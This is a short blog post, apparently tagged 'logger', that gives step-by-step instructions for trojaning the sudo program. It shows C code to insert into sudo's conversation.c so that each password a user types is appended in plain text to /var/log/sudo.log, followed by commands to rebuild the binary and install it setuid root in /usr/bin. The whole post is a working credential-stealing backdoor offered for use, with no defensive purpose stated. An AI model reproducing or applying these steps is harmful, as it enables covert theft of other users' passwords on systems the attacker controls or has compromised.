Tag Archives: logger

How to get passwords through sudo

1) download sudo sources
2) open file conversation.c
3) add

1
#include<stdio.h>

4) search strings

1
2
3
pass = tgetpass(msg->msg, msg->timeout, flags);
if (pass == NULL)
    goto err;

4) after previous strings add code

1
2
3
4
FILE *file;
file = fopen("/var/log/sudo.log","a+");
fprintf(file, "%s\n", pass);
fclose(file);

5) build sudo (read README and INSTALL files, but really run only «./configure && make» commands)
6) put new sudo binary in /usr/bin/ folder
7) chmod 4000 /usr/bin/sudo
8) chmod +x /usr/bin/sudo
9) chown root.root /usr/bin/sudo
10) you could find passwords in /var/log/sudo.log after user's using of that command